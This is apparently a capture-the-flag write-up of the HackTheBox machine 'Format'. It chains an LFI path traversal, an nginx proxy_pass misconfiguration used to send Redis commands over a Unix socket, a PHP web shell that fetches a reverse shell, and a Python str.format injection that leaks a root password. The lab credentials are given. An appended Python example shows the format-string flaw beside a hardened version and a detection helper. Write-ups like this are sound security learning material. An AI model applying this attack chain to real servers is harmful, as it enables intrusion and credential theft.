Last updated
Format was a medium machine from HackTheBox. You need to exploit an LFI to read the nginx configuration files and discover a proxy_pass misconfiguration, which lets you talk to the Redis Unix socket on the machine, set your account to pro status, and obtain a directory the application has permission to write to and execute PHP scripts from. On the machine, you can run a Python script as root, where you need to exploit a format-string vulnerability to read a secret from the program's memory and use it as the root password.
After running rustscan with nmap, I noted that two web services were running. Opening the one on port 3000, I reached a Gitea page. Exploring the repositories on the site, I found a repo called "Microblog", so I downloaded it and started looking for a vulnerability before exploring the site itself.
Searching the code for vulnerable functions, I discovered how the site fetches content and serves it to whoever accesses the site.
First, we can see the PHP opening the file called order.txt, reading its contents line by line and passing each line to the file_get_contents function.
Now, browsing the source code to find where the order.txt file is written, I found it in the edit/index.php file and started to analyse it.
This part of the program takes the id POST parameter, writes its content to the order.txt file, then takes the txt or header parameter and writes its content to the file named by the id value.
Sending a path-traversal payload to read the contents of the /etc/passwd file, we successfully received the contents of the passwd file.
After reading some configuration files, I came to the /etc/nginx/sites-available/default file and noticed an interesting directive called proxy_pass.
The attack is fairly simple: the proxy_pass directive tells nginx to forward the connections it receives to a location chosen by the system admin. But instead of communicating only with an HTTP service, we can use the unix wrapper to communicate with Unix sockets.
So, checking the source code to see how Microblog accesses the Redis database, we can see it uses the /var/run/redis/redis.sock socket file.
Now, issuing an HSET to set the pro value of our account to "true", we receive a 502 Bad Gateway message.
But checking the dashboard to see whether the payload worked, we can see a star indicating that our account is now pro.
Going back to the code and searching for what actually changes when we are pro, I noted that a new directory called uploads is created and we have permission to write to it.
So, using our previous arbitrary file write to write this file to upload/shell.php and accessing the page in the browser, the server downloaded my reverse shell, executed it with sh, and I received a remote shell connection.
Accessing the Redis database and dumping the cooper.dooper password, I got the password zooperdoopercooper, which I used to log in to the cooper account via SSH.
Running sudo -l to list the programs cooper can run on the machine as other users, we can see the /usr/bin/license Python script.
Reading the source code, one thing caught my attention: the format function.
The attack is simple: we just need to pass an object we can read inside a {} placeholder. So, by creating a new account in the database and inserting a custom payload as the value of the first-name key to read the globals, I was able to retrieve the secret unCR4ckaBL3Pa$$w0rd and log in as root using it as the password.
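An added illustration of this bug class, not code from the write-up or from the machine's license script: when user input is concatenated into the template handed to str.format() together with an object, braces in that input become format fields with attribute access. The names License, build_banner_unsafe, build_banner_safe and has_format_fields are assumed, and SECRET is a constructed stand-in.

```python
import string

# Constructed stand-in for a module-level secret; not the machine's real value.
SECRET = "placeholder-secret"


class License:
    """Hypothetical record built from user-controlled account fields."""

    def __init__(self, first_name: str, last_name: str):
        self.first_name = first_name
        self.last_name = last_name


def build_banner_unsafe(user: License) -> str:
    # Vulnerable pattern: the user-controlled first_name is spliced into the
    # template *before* .format() runs, so any "{...}" inside it is parsed as
    # a format field and may traverse attributes of the passed object.
    template = "Licensed to " + user.first_name + " " + user.last_name
    return template.format(user=user)


def build_banner_safe(user: License) -> str:
    # Hardened: the template is a constant; untrusted values are substituted
    # as data and are never re-parsed as format fields.
    return "Licensed to {first} {last}".format(
        first=user.first_name, last=user.last_name
    )


def has_format_fields(value: str) -> bool:
    # Detection helper: flag input that str.format() would interpret as a
    # field (e.g. "{x.y}"); unbalanced braces are treated as suspicious too.
    try:
        parsed = string.Formatter().parse(value)
        return any(field is not None for _, field, _, _ in parsed)
    except ValueError:
        return True


if __name__ == "__main__":
    probe = License("{user.__class__.__name__}", "Doe")
    print(build_banner_unsafe(probe))  # attribute lookup happens: "License"
    print(build_banner_safe(probe))    # braces survive as plain text
    print(has_format_fields(probe.first_name), has_format_fields("Cooper"))
```

The unsafe banner resolves the probe's class name, proving that attribute traversal is reachable from the first-name field; the safe variant leaves the braces untouched.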
At first glance, it looks like a simple SSRF attack, but searching a little more I found an article by Detectify explaining how we can exploit it to communicate with Unix sockets.
Searching the web for ways to exploit this, I found a topic about it explaining how to read in-memory objects.